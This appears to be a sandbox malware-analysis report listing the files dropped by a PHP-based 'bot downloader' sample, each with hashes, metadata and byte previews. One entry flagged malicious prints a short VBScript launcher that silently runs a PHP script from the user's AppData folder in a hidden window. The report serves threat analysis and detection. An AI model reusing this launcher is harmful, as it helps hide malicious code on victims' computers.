                                              Preview:SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:284-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="SetConf
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):29752
                                              Entropy (8bit):5.382445617555816
                                              Encrypted:false
                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:PT99BI92vIYfoTKzoT9wDkvTzn2zKU
                                              MD5:D40A077E7A169861FEBB0048E46A7C45
                                              SHA1:E637CBAA5C68E5F9CE096133411FCDFB0DE0D268
                                              SHA-256:6757B58669AD8A7E5DD64707BE01EA9B64B750BDE2599C49000355840D7D5DB4
                                              SHA-512:3DD8C74284C545ACD595EA9B2D55196CB16FB9070453FA46041857740B9C70D3737F29F065FCB1658932B0E00DC8840C3DEC0E5345CC8F1674B5A7292278D637
                                              Malicious:false
                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                              Category:dropped
                                              Size (bytes):386528
                                              Entropy (8bit):7.9736851559892425
                                              Encrypted:false
                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                              Malicious:false
                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                              Category:dropped
                                              Size (bytes):1419751
                                              Entropy (8bit):7.976496077007677
                                              Encrypted:false
                                              SSDEEP:24576:/ewYIGNPgOWL07oXGZYydpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:WwZGDWLxXGZYy3mlind9i4ufFXpAXkru
                                              MD5:B5A02C3D681A7AB59BFAC60042210B9E
                                              SHA1:28F87F32A4AC3381299901EDD03BB1C4BFD4C053
                                              SHA-256:B9E5CD9C8234873C74D1004A7DE9D375BE42DB3ECA0F2A29CCEB21C5A88375AC
                                              SHA-512:EF8F24646CEEF80D444C526439FD300555F5B2E5773534ED02BA5B0A6ADB87B5D3B23034095E232E4DB2E2AA777A672D93A4E3F715E41867CA42A72D1E5A632A
                                              Malicious:false
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                              Category:dropped
                                              Size (bytes):1407294
                                              Entropy (8bit):7.97605879016224
                                              Encrypted:false
                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                              MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                              SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                              SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                              SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                              Malicious:false
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                              Category:dropped
                                              Size (bytes):758601
                                              Entropy (8bit):7.98639316555857
                                              Encrypted:false
                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                              MD5:3A49135134665364308390AC398006F1
                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                              Malicious:false
                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):98682
                                              Entropy (8bit):6.445287254681573
                                              Encrypted:false
                                              SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                              MD5:7113425405A05E110DC458BBF93F608A
                                              SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                              SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                              SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                              Malicious:false
                                              Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):737
                                              Entropy (8bit):7.501268097735403
                                              Encrypted:false
                                              SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                              MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                              SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                              SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                              SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                              Malicious:false
                                              Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                              Process:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.1988325826246875
                                              Encrypted:false
                                              SSDEEP:6:jtiGNOlyRVFeEPwknaZ538TR9MNwknaZ538TR9oqvKbEJvwWA:c9lYFeLrH3mRS+rH3mRdJvwWA
                                              MD5:0A51A1638534D38D0AED713EA385C770
                                              SHA1:734611E91663E32A14FED95531195965E5C90618
                                              SHA-256:D3F110DD9333F5F59656BA380BA73B884FC9F680D0A24C421B19031F3EA7021E
                                              SHA-512:2B9BA240D4F030925BABC4A5BB478ADDF2200D0215D099ADCC60C9162C8FBD432F300218D82DC62698C29BBB4A62FF27A867ACB7C1C2239AC9F52B6E8A156282
                                              Malicious:true
                                              Preview:Set oShell = CreateObject ("Wscript.Shell") ..Dim strArgs..strArgs = "cmd /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php"..oShell.Run strArgs, 0, false
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PDF document, version 1.5
                                              Category:dropped
                                              Size (bytes):13992
                                              Entropy (8bit):7.859157294568209
                                              Encrypted:false
                                              SSDEEP:192:uKKIwzdRBvoFiyCkub+95r5pE/kJkYMmC53MR/Ii1lAa7XqslQHVLSyIpX3de5wb:0PAojAFoD3MRVCa7XLlQhynSWqC
                                              MD5:A84ECD0D7CDE3DED019FF7D98E029BC8
                                              SHA1:CD581933B2D4195A954D4588669384FB777CAC2F
                                              SHA-256:39ED6A55B0F046C5C61429A5E2C52432C51A5909D9B2DC9D6ABA607BC0C15F30
                                              SHA-512:6DCB7A97803D1E6DC9899D58686579C76DB280D029C8D79C6C39B7BF095D823A6479AB07E3D415A695EFBBAB41BBA3FC73EFE0092631A3C19542DDDB5C330353
                                              Malicious:false
                                              Preview:%PDF-1.5.%.....2 0 obj.<<./Type /Catalog./Pages 4 0 R./OpenAction [5 0 R /FitH null]./PageLayout /OneColumn./AcroForm 6 0 R./Version /1#2E5.>>.endobj.8 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.9 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.10 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.11 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.12 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.13 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.14 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.15 0 obj.<<./Filter /FlateDecode./Length 761.>>.stream..x....r.0.....{...EgK.Mi..E......A.c......v0..3f@....].9..#.D..._\Y.DR.Wm....n...3..P..$....!B.a.(.J....$'.C.$x..n.0.v$..a.B..7.\5..o!..C<....p.%VB.%........{.^ O.o....W~.+.J.....+..8.|...a...D..`x..d.Bt..
                                              Process:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                              Category:dropped
                                              Size (bytes):31886616
                                              Entropy (8bit):7.996327176919507
                                              Encrypted:true
                                              SSDEEP:786432:4Dz+kmvQr7HvMeqWGbmv9+0/NyvLkuPO/oNGtbogIX+xzBYR6GuSZ:4DzvmYr7HsbaYOYKHzBYR6GP
                                              MD5:29C9E2CDE366197C69D233D35E7B37EC
                                              SHA1:3D2F575DBCE04912774D71D89397D993BF60AAFB
                                              SHA-256:F5651BFB5DE738EA1A0E361EB2057DFAB93E0BAC52B3BEC67DFA7A329E1887E7
                                              SHA-512:D7EE3C97E72209537519E04E3D2182385E0B3A8BA575F0D581CEE3C1F82ABAD79E74BF02929C9356A93E71473A06AE4E7776E3353272FAF29EFD7FD8FDCB16A9
                                              Malicious:false
                                              Preview:PK.........b$Z................php-8.2.11-Win32-vs16-x64/PK..........:W.Y.........'...php-8.2.11-Win32-vs16-x64/deplister.exe.\i|T....%..M$.....6..@.&N.y.....H@.E$.Y..J..$.I4..(m.b.-...@[..."[....%...F4.&.....o&..]~..../..].=..s.=..s.}..o.,. X..uAh..?.......|g..\..&...[..[.\.j.Uw....V...9W..p....7c.....,.6##...1.'.l..{/..m.~:...=]..[O..^..gO.........I<......}o6.....m.=...............E..n..!.9J.b...F..ax8.. ....!.'....H..A.P.)^..54~APx.#.P4..n....A....&...&a.g........L.R.._..Z....7...[..8...U...%..~`..~..-x.....Z.L.:.:......E.]...>.....G..[8.'.*!.........Z.|E.......x_t.\....!.JXq9...+.ou9........E.3...)......2..U&G2..&A.D.F...D..(..?.._rhOA.~.oH-.v.].5.0..&9.s.....$...........2..H&A..r..V.../5.......J{..2.5O....)..j...}o.@K..8...#.......H..A].&y....q.m...IT.[.G.f..uxg...({t..Kl.n..........C.s.6.rmT..~.....xi.V<.2.....hp&.k.l.S..i...T..B...m+/s.}.'.8f.._......I.W.....I.].0.....^.P~..y.<..$.|.....}.l.....r......oLT.X.y...{.....H.Q.q..,....1H.k.
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):5215
                                              Entropy (8bit):5.049213558480258
                                              Encrypted:false
                                              SSDEEP:96:LXTqtuZSdgMGEl6edRe4sq+WoWQdrdQR4ks1z4Maj1OQybvb5fEo8v/L4kYfIH:fZAV0hWoWQdJz9RCXn8AH
                                              MD5:EB21DB12F94395D282CEEA1B89FD96CE
                                              SHA1:2E9404B1E47D8FBFA93DC9D6E0AA13EEF9262EA6
                                              SHA-256:093947FE0C56958909B0254B90E5F35C17367E858E85E144518E5913612272E6
                                              SHA-512:11B35288D941BDD772D1E8E5A20819EACFDA2B59EA32FB18BEA3F10F4B61D1EE8E4E22F473FC095E379AF3517561530B3097B7D74DA477237F71AB52C0998737
                                              Malicious:false
                                              Preview:<div align="center">.. <a href="https://php.net">.. <img.. alt="PHP".. src="https://www.php.net/images/logos/new-php-logo.svg".. width="150">.. </a>..</div>....# The PHP Interpreter....PHP is a popular general-purpose scripting language that is especially suited to..web development. Fast, flexible and pragmatic, PHP powers everything from your..blog to the most popular websites in the world. PHP is distributed under the..[PHP License v3.01](LICENSE).....[![Push](https://github.com/php/php-src/actions/workflows/push.yml/badge.svg)](https://github.com/php/php-src/actions/workflows/push.yml)..[![Build status](https://travis-ci.com/php/php-src.svg?branch=master)](https://travis-ci.com/github/php/php-src)..[![Build Status](https://dev.azure.com/phpazuredevops/php/_apis/build/status/php.php-src?branchName=master)](https://dev.azure.com/phpazuredevops/php/_build/latest?definitionId=1&branchName=master)..[![Fuzzing Status](https://oss-fuzz-build-lo
                                              Process:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):35
                                              Entropy (8bit):4.61499730265925
                                              Encrypted:false
                                              SSDEEP:3:YIygXZoC4:YIygpoC4
                                              MD5:27ACF002C7E9A08F6DA5131B48F55F92
                                              SHA1:E483701A0FF41FC179C3CE4CFB5F9B9F94F622CF
                                              SHA-256:3EF55B76B49F35577DFAF29D12A5271A121C5F1A30150CD7595A878DC9D6962E
                                              SHA-512:D08BAD43B4E7B73A83107F57CB603DBBBF5AA3388B75608B8B736EF68474D0569019F83F7CDC9C22545BCD904C6BC48A37969997F3D2D15028BE43973AD4A4F6
                                              Malicious:false
                                              Preview:{"mid":"PKJ2RMXRS481H4NV6VCC978Z3"}
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):137728
                                              Entropy (8bit):6.169106814401788
                                              Encrypted:false
                                              SSDEEP:3072:TTAwfmrTEtePxy/OC5Q1F0rLG0j1iNuqsC:owfmr4tmyZQ1F86fsC
                                              MD5:658D4D78AB13D9205BB981D2B320FF3D
                                              SHA1:D9A236461F8A2832472E5002A45FA125FC7C307D
                                              SHA-256:861CEA918217D9D0A189DD4220DAE21409B5B05C4AB4D71B07401EEC90415979
                                              SHA-512:1478FF69BB67EE89151BBB0F7EC9E31ECE595A64FC8609A7643C536A66BC0B5461F3A53EE3738D1F6DB574DF6E9BD56256907E879110A69E20F19346FB7E5576
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:current ar archive
                                              Category:dropped
                                              Size (bytes):899110
                                              Entropy (8bit):5.278475644793723
                                              Encrypted:false
                                              SSDEEP:24576:CH2CK7ISYYUA2uv4h5AjxFYhDEvWKBKuj5hYFDhAxCHD8xFDJl+0zUv2CLO5aYnk:1Cph5AjxFYhDcj5hYFDhAxC0KYn8tOTA
                                              MD5:91AF7CF7F07C80ECDA554EF46A72AC68
                                              SHA1:2995D8CCC525DC34EDED260D042C37B3B53DB02E
                                              SHA-256:45BCB2D324F6B55D65D3BB911732EFF36462D0E56BA00199179A2A7C2C4DA64F
                                              SHA-512:BCAE717B53C8546411942E003D850675A37CFA93E954FC209FF091B145D422E2239AD9D1AEDACA23BCA78FF6A854CB0272BFFBEF4DF3F8412568847697383227
                                              Malicious:false
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):86528
                                              Entropy (8bit):6.281181200934599
                                              Encrypted:false
                                              SSDEEP:1536:BH5X17IIL23le3qAvLJJAJ/LBdlgoHKepKyRG30TQVL2hCD+PANmxIzkZwr72HE8:BH5lh23lgxJJAJ/LBdeoHKepKyRG30Tf
                                              MD5:720E64E92AA6931056CDB0939FE56A32
                                              SHA1:A9AE4762401B26180DCA023C6265DB8428FDA87C
                                              SHA-256:653405756355F72F6747B72B0BCD98DB13E0C49EA0FDC42868D2B631EAB7D7A8
                                              SHA-512:86B823787AF84951A86316179C1FCE371BCE5F8480F1C62E7C5D9E25720C6701F15BF1BC1951459CF714EFDF42740EC309F1D30A9C418C667417BC25766B988E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):93184
                                              Entropy (8bit):5.978941296348925
                                              Encrypted:false
                                              SSDEEP:1536:BsaJPBjIIXAxIVUMvbPQFfmp5EA6pECZcf46gTb4l6:BnPBjvXcIH2epGND1Zb4l6
                                              MD5:3E142577EB957815AF13BF1A5C93EBB7
                                              SHA1:F1E8D0724612AAFFD4DA3907A4E35899832C0F07
                                              SHA-256:B6186371BA44F02B40EB362D040F79C85C84B179234CB30EED0542810B7F5B03
                                              SHA-512:165D4D7613988C03C824132243F28964EB15B5D4387D30CF434DCDD0FC744016B3FF0C14F175CF73483468940AE14FA991BFAC8BF09F33968619CC3495483155
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):613376
                                              Entropy (8bit):6.396854012508999
                                              Encrypted:false
                                              SSDEEP:12288:HrzeAEkcbT1GzMSqr/b8QSylPgsUNsvu0znRwso:HrzVEkm1yEbbbSybUq2kwb
                                              MD5:34E47D3BBAD249717A2BB4AC725988A4
                                              SHA1:B588ABFE93ADA4E2E78F43FF39976013A3AA8F48
                                              SHA-256:E6A7EFDB029495FD9CA9AFA90662426BF5714EAABCBC24BD576EC75D042F70E8
                                              SHA-512:ABDB5E58B2C8E29BB6260DD9D5D1A5BA5D25104FE54871A6C85B557299EBFD669B99C2678F5860AB8190F880B1286F23DC2B7824E5ECF8DE4BD379A515B9A377
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):155136
                                              Entropy (8bit):6.327094904008958
                                              Encrypted:false
                                              SSDEEP:3072:HAiu7bIQdAua00c5Cb98xCvUd4xbVoQ/vV5rfnUV+8yJ:giu7V0T98UUd4bV7/vbn6+8A
                                              MD5:71BB1DF2571CF66FF93B96036E54F2FF
                                              SHA1:CBFA868C272386C89DDC98F5CE1B699737A47548
                                              SHA-256:AA9A1003E20B4E8896DBE08616C92C094DE2C616B44703094CE88CD4DD4FB8F2
                                              SHA-512:CDBC9DBC4922B946C57828BA1EDE70A7DB85575C15690160C958F9C0C2B1EE15B626F8F5099A3ADF3C08B611B4A4DBE610F8F59A2692A18A0D70DD0DA19FE887
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):15872
                                              Entropy (8bit):4.9651171125725115
                                              Encrypted:false
                                              SSDEEP:192:g/X+vYbwIYHkgAIvphVn8XbfnMYu/AP3cnemwoot1mskcqron2ggkfu:Lv0wPaIREbqARKsYron2ggkfu
                                              MD5:A64A630D422F8CBCBC484D9C510CB104
                                              SHA1:746D5588B77FCD15ED47E077D8C40609773265EC
                                              SHA-256:02C4AC74A952934C1B71899C91DCCCDA02DC90F8E33A0191C405B9627737569E
                                              SHA-512:C094B9979A1F460FE69C9DDAB3ABD3F23A37A2BDE8466B424CA69A2FF79B6C22521D01CCCCA08B444F46F58D87353CFA9C64EEA8435C38248FB5A2D46B1DC096
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):25600
                                              Entropy (8bit):5.3178190581624385
                                              Encrypted:false
